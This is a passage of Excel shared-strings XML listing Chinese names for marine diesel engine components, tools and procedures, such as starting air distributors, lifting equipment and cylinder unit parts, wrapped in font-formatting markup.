        <charset val="134"/>
      </rPr>
      <t>平衡重液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平头螺柱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>剖分联轴节总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>剖面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>剖面图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>葡萄牙语说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>普通单行键</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>普通紧固说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其余部件起吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动泵</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动变压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动和停止图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动滑道</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动滑道扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动滑道布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器锁止</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气滑道安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气滑道盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气膨胀管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> MC-S</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动箱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起吊工具，辅助鼓风机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起吊工具试验</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起吊设备管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起吊质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动，操纵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运转</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制组</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀生产技术规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀铣刀及研磨轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀研磨杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀研磨环</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动活塞阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动活塞阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动活塞阀室</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气储气罐</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器，管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气隔膜片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气缓冲</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气系统面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气系统用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动系统布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动准备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重附加装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重机吊梁的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重机横梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重夹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重皮带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重手柄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重手柄组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压增压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动打印机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动导向装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动活塞锥环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动联轴器气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动零部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动扭矩驱动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动盘车装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动气缸安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动元件板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动执行器，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动执行器，过盈起动阀门</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气阀工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气阀模型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气阀旋转机构检修套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气阀旋转机构维修工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸部分支架布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸部分主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸部件管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元，备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元备件套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元的垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元工具板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
